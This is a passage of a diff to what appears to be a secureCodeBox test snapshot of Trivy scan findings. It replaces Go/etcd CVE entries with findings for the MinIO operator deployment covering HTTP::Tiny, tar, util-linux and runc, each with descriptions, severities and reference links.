"https://www.openwall.com/lists/oss-security/2023/05/03/4", + "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", ], }, "category": "Vulnerability", - "description": "The golang.org/x/crypto/ssh package before 0.0.0-20220314234659-1baeb1ce4c0b for Go allows an attacker to crash a server in certain circumstances involving AddHostKey.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "crash in a golang.org/x/crypto/ssh server", + "name": "HTTP::Tiny before 0.083, a Perl core module since 5.13.9 and available ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27191", + "value": "https://avd.aquasec.com/nvd/cve-2023-31486", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8008", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27191", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1939485", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989564", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989570", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/1989575", + "value": "https://github.com/chansen/p5-http-tiny/pull/153", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2064702", + "value": "https://hackeriet.github.io/cpan-http-tiny-overview/", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121445", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2121453", + "value": "https://www.openwall.com/lists/oss-security/2023/05/03/4", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8008.html", + "value": "https://www.reddit.com/r/perl/comments/111tadi/psa_httptiny_disabled_ssl_verification_by_default/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2005-2541", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "http://marc.info/?l=bugtraq&m=112327628230258&w=2", + "https://access.redhat.com/security/cve/CVE-2005-2541", + "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", + "https://www.cve.org/CVERecord?id=CVE-2005-2541", + ], + }, + "category": "Vulnerability", + "description": "Tar 1.15.1 does not properly warn the user when extracting setuid or setgid files, which may allow local users or remote attackers to gain privileges.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "tar: does not properly warn the user when extracting setuid or setgid files", + "references": [ { "type": "URL", - "value": "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", + "value": "https://avd.aquasec.com/nvd/cve-2005-2541", }, { "type": "URL", - "value": "https://go.dev/cl/392355", + "value": "http://marc.info/?l=bugtraq&m=112327628230258&w=2", }, { "type": "URL", - "value": "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", + "value": "https://access.redhat.com/security/cve/CVE-2005-2541", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://lists.apache.org/thread.html/rc713534b10f9daeee2e0990239fa407e2118e4aa9e88a7041177497c@%3Cissues.guacamole.apache.org%3E", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2005-2541", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", + "value": "https://www.cve.org/CVERecord?id=CVE-2005-2541", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-48303", + "installedVersion": "1.34+dfsg-1", + "packageName": "tar", + "references": [ + "https://access.redhat.com/errata/RHSA-2023:0959", + "https://access.redhat.com/security/cve/CVE-2022-48303", + "https://bugzilla.redhat.com/2149722", + "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", + "https://errata.almalinux.org/9/ALSA-2023-0959.html", + "https://errata.rockylinux.org/RLSA-2023:0959", + "https://linux.oracle.com/cve/CVE-2022-48303.html", + "https://linux.oracle.com/errata/ELSA-2023-0959.html", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", + "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", + "https://savannah.gnu.org/bugs/?62387", + "https://savannah.gnu.org/patch/?10307", + "https://ubuntu.com/security/notices/USN-5900-1", + "https://ubuntu.com/security/notices/USN-5900-2", + "https://www.cve.org/CVERecord?id=CVE-2022-48303", + ], + }, + "category": "Vulnerability", + "description": "GNU Tar through 1.34 has a one-byte out-of-bounds read that results in use of uninitialized memory for a conditional jump. Exploitation to change the flow of control has not been demonstrated. The issue occurs in from_header in list.c via a V7 archive in which mtime has approximately 11 whitespace characters.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "heap buffer overflow at from_header() in list.c via specially crafted checksum", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-27191.html", + "value": "https://avd.aquasec.com/nvd/cve-2022-48303", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-8008.html", + "value": "https://access.redhat.com/errata/RHSA-2023:0959", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", + "value": "https://access.redhat.com/security/cve/CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", + "value": "https://bugzilla.redhat.com/2149722", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2149722", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48303", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", + "value": "https://errata.almalinux.org/9/ALSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://errata.rockylinux.org/RLSA-2023:0959", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", + "value": "https://linux.oracle.com/cve/CVE-2022-48303.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://linux.oracle.com/errata/ELSA-2023-0959.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/CRY7VEL4AIG3GLIEVCTOXRZNSVYDYYUD/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5VQYCO52Z7GAVCLRYUITN7KXHLRZQS4/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-48303", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", + "value": "https://savannah.gnu.org/bugs/?62387", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0356", + "value": "https://savannah.gnu.org/patch/?10307", }, { "type": "URL", - "value": "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", + "value": "https://ubuntu.com/security/notices/USN-5900-1", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220429-0002/", + "value": "https://ubuntu.com/security/notices/USN-5900-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-48303", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20211209124913-491a49abca63", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-44716", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-0563", + "installedVersion": "2.36.1-8+deb11u1", + "packageName": "util-linux", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-44716", - "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", - "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", - "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", - "https://github.com/golang/go/issues/50058", - "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", - "https://go.dev/cl/369794", - "https://go.dev/issue/50058", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", - "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", - "https://linux.oracle.com/cve/CVE-2021-44716.html", - "https://linux.oracle.com/errata/ELSA-2022-0001.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", - "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", - "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", - "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", - "https://pkg.go.dev/vuln/GO-2022-0288", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220121-0002/", - "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "https://access.redhat.com/security/cve/CVE-2022-0563", + "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", + "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", + "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", + "https://security.netapp.com/advisory/ntap-20220331-0002/", + "https://www.cve.org/CVERecord?id=CVE-2022-0563", ], }, "category": "Vulnerability", - "description": "net/http in Go before 1.16.12 and 1.17.x before 1.17.5 allows uncontrolled memory consumption in the header canonicalization cache via HTTP/2 requests.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "A flaw was found in the util-linux chfn and chsh utilities when compiled with Readline support. The Readline library uses an "INPUTRC" environment variable to get a path to the library config file. When the library cannot parse the specified file, it prints an error message containing data from the file. This flaw allows an unprivileged user to read root-owned files, potentially leading to privilege escalation. This flaw affects util-linux versions prior to 2.37.4.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "golang: net/http: limit growth of header canonicalization cache", + "name": "util-linux: partial disclosure of arbitrary files in chfn and chsh when compiled with libreadline", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-44716", + "value": "https://avd.aquasec.com/nvd/cve-2022-0563", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-44716", + "value": "https://access.redhat.com/security/cve/CVE-2022-0563", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-744259.pdf", + "value": "https://blog.trailofbits.com/2023/02/16/suid-logic-bug-linux-readline/", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44716", + "value": "https://lore.kernel.org/util-linux/20220214110609.msiwlm457ngoic6w@ws.net.home/T/#u", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-vc3p-29h2-gpcp", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-0563", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/48d948963c5ce7add72af5665a871caff6c1d35a (go1.17.5)", + "value": "https://security.netapp.com/advisory/ntap-20220331-0002/", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/50058", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-0563", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": "1.1.5", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2023-27561", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/security/cve/CVE-2023-27561", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", + "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", + "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", + "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", + "https://github.com/opencontainers/runc/issues/3751", + "https://github.com/opencontainers/runc/pull/3785", + "https://github.com/opencontainers/runc/releases/tag/v1.1.5", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", + "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", + "https://ubuntu.com/security/notices/USN-6088-1", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2023-27561", + ], + }, + "category": "Vulnerability", + "description": "runc through 1.1.4 has Incorrect Access Control leading to Escalation of Privileges, related to libcontainer/rootfs_linux.go. To exploit this, an attacker must be able to spawn two containers with custom volume-mount configurations, and be able to run custom images. NOTE: this issue exists because of a CVE-2019-19921 regression.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "volume mount race condition (regression of CVE-2019-19921)", + "references": [ { "type": "URL", - "value": "https://github.com/golang/net/commit/491a49abca63de5e07ef554052d180a1b5fe2d70", + "value": "https://avd.aquasec.com/nvd/cve-2023-27561", }, { "type": "URL", - "value": "https://go.dev/cl/369794", + "value": "https://access.redhat.com/security/cve/CVE-2023-27561", }, { "type": "URL", - "value": "https://go.dev/issue/50058", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27561", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", + "value": "https://gist.github.com/LiveOverflow/c937820b688922eb127fb760ce06dab9", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/hcmEScgc00k/m/ZWnOjeY4CQAJ", + "value": "https://github.com/advisories/GHSA-vpvm-3wq2-2wvm", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-44716.html", + "value": "https://github.com/opencontainers/runc/issues/2197#issuecomment-1437617334", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-0001.html", + "value": "https://github.com/opencontainers/runc/issues/3751", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00016.html", + "value": "https://github.com/opencontainers/runc/pull/3785", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/01/msg00017.html", + "value": "https://github.com/opencontainers/runc/releases/tag/v1.1.5", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/04/msg00021.html", + "value": "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-44716", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DHGVGGMKGZSJ7YO67TGGPFEHBYMS63VF/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0288", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/FYVE3GB4OG3BNT5DLQHYO4M5SXX33AQ5/", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I6BF24VCZRFTYBTT3T7HDZUOTKOTNPLZ/", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220121-0002/", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-27561", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-44716", + "value": "https://ubuntu.com/security/notices/USN-6088-1", + }, + { + "type": "URL", + "value": "https://ubuntu.com/security/notices/USN-6088-2", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-27561", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.0.0-20220906165146-f3363e06e74c", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27664", - "installedVersion": "v0.0.0-20211112202133-69e39bad7dc2", - "packageName": "golang.org/x/net", + "fixedVersion": "1.1.0", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2021-43784", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", "references": [ - "https://access.redhat.com/errata/RHSA-2023:2357", - "https://access.redhat.com/security/cve/CVE-2022-27664", - "https://bugzilla.redhat.com/2107371", - "https://bugzilla.redhat.com/2107374", - "https://bugzilla.redhat.com/2107383", - "https://bugzilla.redhat.com/2107386", - "https://bugzilla.redhat.com/2107388", - "https://bugzilla.redhat.com/2113814", - "https://bugzilla.redhat.com/2124669", - "https://bugzilla.redhat.com/2132868", - "https://bugzilla.redhat.com/2132872", - "https://bugzilla.redhat.com/2161274", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", - "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", - "https://bugzilla.redhat.com/show_bug.cgi?id=2107388", - "https://bugzilla.redhat.com/show_bug.cgi?id=2113814", - "https://bugzilla.redhat.com/show_bug.cgi?id=2124669", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28851", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28852", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1705", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-27664", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30630", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30632", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30635", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32148", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32189", - "https://errata.almalinux.org/9/ALSA-2023-2357.html", - "https://errata.rockylinux.org/RLSA-2022:7129", - "https://github.com/advisories/GHSA-69cg-p879-7622", - "https://github.com/golang/go/commit/5bc9106458fc07851ac324a4157132a91b1f3479 (go1.18.6)", - "https://github.com/golang/go/commit/9cfe4e258b1c9d4a04a42539c21c7bdb2e227824 (go1.19.1)", - "https://github.com/golang/go/issues/54658", - "https://go.dev/cl/428735", - "https://go.dev/issue/54658", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s", - "https://groups.google.com/g/golang-announce/c/x49AQzIVX-s/m/0tgO0pjiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-27664.html", - "https://linux.oracle.com/errata/ELSA-2023-2802.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JXKTHIGE5F576MAPFYCIJXNRGBSPISUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TXS2OQ57KZC5XZKK5UW4SYKPVQAHIOJX/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27664", - "https://pkg.go.dev/vuln/GO-2022-0969", - "https://security.gentoo.org/glsa/202209-26", - "https://security.netapp.com/advisory/ntap-20220923-0004/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-27664", + "https://access.redhat.com/security/cve/CVE-2021-43784", + "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", + "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", + "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", + "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", + "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", + "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", + "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", + "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", + "https://pkg.go.dev/vuln/GO-2022-0274", + "https://www.cve.org/CVERecord?id=CVE-2021-43784", ], }, "category": "Vulnerability", - "description": "In net/http in Go before 1.18.6 and 1.19.x before 1.19.1, attackers can cause a denial of service because an HTTP/2 connection can hang during closing if shutdown were preempted by a fatal error.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc, netlink is used internally as a serialization system for specifying the relevant container configuration to the \`C\` portion of the code (responsible for the based namespace setup of containers). In all versions of runc prior to 1.0.3, the encoder did not handle the possibility of an integer overflow in the 16-bit length field for the byte array attribute type, meaning that a large enough malicious byte array attribute could result in the length overflowing and the attribute contents being parsed as netlink messages for container configuration. This vulnerability requires the attacker to have some control over the configuration of the container and would allow the attacker to bypass the namespace restrictions of the container by simply adding their own netlink payload which disables all namespaces. The main users impacted are those who allow untrusted images with untrusted configurations to run on their machines (such as with shared cloud infrastructure). runc version 1.0.3 contains a fix for this bug. As a workaround, one may try disallowing untrusted namespace paths from your container. It should be noted that untrusted namespace paths would allow the attacker to disable namespace protections entirely even in the absence of this bug.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "handle server errors after sending GOAWAY", + "name": "integer overflow in netlink bytemsg length field allows attacker to override netlink-based container configuration", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-27664", - }, - { - "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2357", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-27664", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107371", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107374", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107383", - }, - { - "type": "URL", - "value": "https://bugzilla.redhat.com/2107386", + "value": "https://avd.aquasec.com/nvd/cve-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2107388", + "value": "https://access.redhat.com/security/cve/CVE-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2113814", + "value": "https://bugs.chromium.org/p/project-zero/issues/detail?id=2241", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2124669", + "value": "https://github.com/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132868", + "value": "https://github.com/opencontainers/runc/commit/9c444070ec7bb83995dbc0185da68284da71c554", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2132872", + "value": "https://github.com/opencontainers/runc/commit/d72d057ba794164c3cce9451a00b72a78b25e1ae", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://github.com/opencontainers/runc/commit/dde509df4e28cec33b3c99c6cda3d4fd5beafc77", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913333", + "value": "https://github.com/opencontainers/runc/commit/f50369af4b571e358f20b139eea52d612eb55eed", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1913338", + "value": "https://github.com/opencontainers/runc/security/advisories/GHSA-v95c-p5hm-xq8f", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107371", + "value": "https://lists.debian.org/debian-lts-announce/2021/12/msg00005.html", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107374", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-43784", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107383", + "value": "https://pkg.go.dev/vuln/GO-2022-0274", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2107386", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-43784", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": "1.1.2", + "foundIn": "Target: 'opt/bitnami/common/bin/gosu' / Class: 'lang-pkgs' / Type: 'gobinary'", + "id": "CVE-2022-29162", + "installedVersion": "v1.0.1", + "packageName": "github.com/opencontainers/runc", + "references": [ + "https://access.redhat.com/errata/RHSA-2022:8090", + "https://access.redhat.com/security/cve/CVE-2022-29162", + "https://bugzilla.redhat.com/2086398", + "https://bugzilla.redhat.com/show_bug.cgi?id=2086398", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29162", + "https://errata.almalinux.org/9/ALSA-2022-8090.html", + "https://errata.rockylinux.org/RLSA-2022:8090", + "https://github.com/advisories/GHSA-f3fp-gc8g-vw66", + "https://github.com/opencontainers/runc/commit/98fe566c527479195ce3c8167136d2a555fe6b65", + "https://github.com/opencontainers/runc/commit/d04de3a9b72d7a2455c1885fc75eb36d02cd17b5", + "https://github.com/opencontainers/runc/releases/tag/v1.1.2", + "https://github.com/opencontainers/runc/security/advisories/GHSA-f3fp-gc8g-vw66", + "https://linux.oracle.com/cve/CVE-2022-29162.html", + "https://linux.oracle.com/errata/ELSA-2022-8090.html", + "https://lists.debian.org/debian-lts-announce/2023/03/msg00023.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AVPZBV7ISA7QKRPTC7ZXWKMIQI2HZEBB/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/D77CKD3AXPMU4PMQIQI5Q74SI4JATNND/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/GPQU4YC4AAY54JDXGDQHJEYKSXXG5T2Y/", + "https://nvd.nist.gov/vuln/detail/CVE-2022-29162", + "https://ubuntu.com/security/notices/USN-6088-2", + "https://www.cve.org/CVERecord?id=CVE-2022-29162", + "https://www.openwall.com/lists/oss-security/2022/05/12/1", + ], + }, + "category": "Vulnerability", + "description": "runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. A bug was found in runc prior to version 1.1.2 where \`runc exec --cap\` created processes with non-empty inheritable Linux process capabilities, creating an atypical Linux environment and enabling programs with inheritable file capabilities to elevate those capabilities to the permitted set during execve(2). This bug did not affect the container security sandbox as the inheritable set never contained more capabilities than were included in the container's bounding set. This bug has been fixed in runc 1.1.2. This 